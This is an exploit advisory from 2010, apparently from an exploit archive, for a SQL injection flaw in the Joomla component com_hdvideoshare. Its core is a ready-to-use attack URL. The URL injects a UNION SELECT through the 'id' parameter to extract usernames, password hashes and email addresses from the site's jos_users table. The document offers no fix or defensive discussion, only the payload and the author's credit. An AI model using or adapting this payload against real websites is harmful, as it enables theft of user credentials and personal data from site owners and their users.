id: 10916
date: 02/15/2010
title: Joomla Component com_hdvideoshare Sql Injection Vulnerability
author: Snakespc
cves: 

=============================================================
Joomla Component com_hdvideoshare Sql Injection Vulnerability
=============================================================

==============================================================================
[»] Joomla com_hdvideoshare Remote Sql Injection Vulnerability
==============================================================================
    
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc ]
    
###########################################################################
 ===[ Exploit ]===
    
[»] http://server/index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(username,0x3a,password,0x3a,email),2,3,4+from+jos_users
[»]Author: Snakespc <-
###########################################################################



#  0day.today [2023-03-25]  #